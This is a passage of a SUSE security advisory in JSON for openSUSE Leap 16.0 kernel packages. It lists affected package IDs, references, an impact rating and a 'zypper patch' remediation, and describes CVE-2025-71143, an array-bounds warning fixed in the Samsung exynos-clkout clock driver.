"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71142"
},
{
"cve": "CVE-2025-71143",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71143"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: samsung: exynos-clkout: Assign .num before accessing .hws\n\nCommit f316cdff8d67 (\"clk: Annotate struct clk_hw_onecell_data with\n__counted_by\") annotated the hws member of \u0027struct clk_hw_onecell_data\u0027\nwith __counted_by, which informs the bounds sanitizer (UBSAN_BOUNDS)\nabout the number of elements in .hws[], so that it can warn when .hws[]\nis accessed out of bounds. As noted in that change, the __counted_by\nmember must be initialized with the number of elements before the first\narray access happens, otherwise there will be a warning from each access\nprior to the initialization because the number of elements is zero. This\noccurs in exynos_clkout_probe() due to .num being assigned after .hws[]\nhas been accessed:\n\n UBSAN: array-index-out-of-bounds in drivers/clk/samsung/clk-exynos-clkout.c:178:18\n index 0 is out of range for type \u0027clk_hw *[*]\u0027\n\nMove the .num initialization to before the first access of .hws[],\nclearing up the warning.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71143",
"url": "https://www.suse.com/security/cve/CVE-2025-71143"
},
{
"category": "external",
"summary": "SUSE Bug 1256749 for CVE-2025-71143",
"url": "https://bugzilla.suse.com/1256749"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
